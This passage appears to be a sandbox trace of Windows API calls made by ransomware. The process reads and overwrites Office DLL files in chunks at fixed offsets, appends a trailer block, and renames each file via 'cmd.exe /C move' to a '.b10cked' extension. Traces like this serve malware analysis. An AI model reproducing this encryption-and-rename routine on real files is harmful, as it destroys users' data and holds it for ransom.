USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0174.918] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0174.918] ReleaseMutex (hMutex=0xf8) returned 1 [0174.918] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0174.918] ReleaseMutex (hMutex=0xf8) returned 1 [0174.918] 
WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0174.918] ReleaseMutex (hMutex=0xf8) returned 1 [0174.918] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0174.918] ReleaseMutex (hMutex=0xf8) returned 1 [0174.918] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\xlintl32.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0174.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x126760 [0174.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.919] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=23170798465) returned 1 [0174.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x126760 [0174.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.919] SetFilePointer (in: hFile=0x120, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x126760 [0174.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x126760 [0174.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x126760 [0174.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.919] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.920] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x126760 [0174.920] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.920] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 
[0174.920] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x126760 [0174.920] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.920] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.920] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x126760 [0174.920] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.920] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.920] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x126760 [0174.920] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.920] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.920] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x126760 [0174.920] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0174.920] SetFilePointer (in: hFile=0x120, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ecec*=0) returned 0x126278 [0174.920] ReadFile (in: hFile=0x120, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0175.236] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0175.236] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0175.236] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x126760 [0175.236] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0175.236] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0175.236] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0175.236] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x126760 [0175.236] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0175.236] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0175.236] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, 
lpOverlapped=0x0) returned 1 [0176.061] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0176.062] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0176.064] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0176.064] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0176.064] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0176.065] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0176.065] SetFilePointer (in: hFile=0x120, lDistanceToMove=393216, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60000 [0176.065] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0176.067] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) 
returned 1 [0176.119] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0176.122] SetFilePointer (in: hFile=0x120, lDistanceToMove=393216, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x60000 [0176.123] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0176.123] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0176.123] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0176.123] SetFilePointer (in: hFile=0x120, lDistanceToMove=786432, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc0000 [0176.123] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0176.403] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0176.448] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 
[0176.450] SetFilePointer (in: hFile=0x120, lDistanceToMove=786432, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc0000 [0176.450] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0176.450] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0176.451] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0176.451] SetFilePointer (in: hFile=0x120, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x106760 [0176.451] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0176.452] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0176.453] ReadFile (in: hFile=0x120, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0176.454] SetFilePointer (in: hFile=0x120, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x106760 [0176.454] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, 
nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0176.455] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0176.455] WriteFile (in: hFile=0x120, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0176.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLINTL32.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0176.460] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLINTL32.REST.trx_dll", cchWideChar=21, lpMultiByteStr=0x1328744, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XLINTL32.REST.trx_dll", lpUsedDefaultChar=0x0) returned 21 [0176.460] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x126760 [0176.460] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0176.460] CloseHandle (hObject=0x120) returned 1 [0176.468] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLINTL32.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~2.TRX") returned 0x3c [0176.469] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All 
Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0176.470] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLINTL32.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xa88, dwThreadId=0xb0c)) returned 1 [0176.474] CloseHandle (hObject=0x1b4) returned 1 [0176.474] CloseHandle (hObject=0x120) returned 1 [0176.474] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0176.474] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0176.475] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) 
returned 2 [0176.475] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0176.475] ReleaseMutex (hMutex=0xf8) returned 1 [0176.475] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0176.475] ReleaseMutex (hMutex=0xf8) returned 1 [0176.475] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0176.475] ReleaseMutex (hMutex=0xf8) returned 1 [0176.475] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0176.475] ReleaseMutex (hMutex=0xf8) returned 1 [0176.475] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\xlslicer.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0176.475] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0176.475] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3960 [0176.475] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0176.475] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=23326441382) returned 1 [0176.475] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0176.475] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3960 [0176.475] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0176.475] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0176.475] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3960 [0176.475] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0176.475] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x3960 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3960 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3960 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3960 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3960 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3960 [0176.476] SetFilePointer (in: 